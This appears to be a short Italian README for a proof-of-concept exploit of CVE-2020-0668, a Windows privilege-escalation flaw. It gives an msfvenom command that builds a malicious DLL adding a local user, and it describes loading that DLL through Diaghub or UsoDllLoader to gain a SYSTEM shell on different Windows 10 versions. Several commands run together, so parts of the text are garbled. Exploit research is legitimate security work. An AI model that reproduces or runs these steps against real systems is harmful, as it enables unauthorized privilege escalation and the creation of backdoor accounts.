
Fai funzionare l'exploit CVE-2020-0668 per versioni < win10 v1903 e versioni >= win10 v1903
Fai funzionare l'exploit CVE-2020-0668 per versioni < win10 v1903 e versioni >= win10 v1903
l'exploit powershell funziona su versioni < win10 v1903 con Diaghub.
evil.dll con msfvenom
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 con powershellDiaghub.exe C:\ProgramData evil.dll per caricare la dll e aggiungere l'utente.
l'exploit powershell funziona su versioni >= win10 v1903 con UsoDllLoader.
exp.ps1 con powershellUsoDllLoader.exe per ottenere una shell di sistema
Una versione x86 release di SysTracingPoc per issue,l'exploit funziona su versioni >= win10 v1903 grazie a UsoLoadDll.
Un PoC .net. Se guardi C:\Windows\System32\evil.dll e la rinomini come evil.txt.
Scoprirai che non è un file dll. Contiene solo un log di tracing.
Un PoC powershell. Anche questo contiene solo un log di tracing in evil.dll.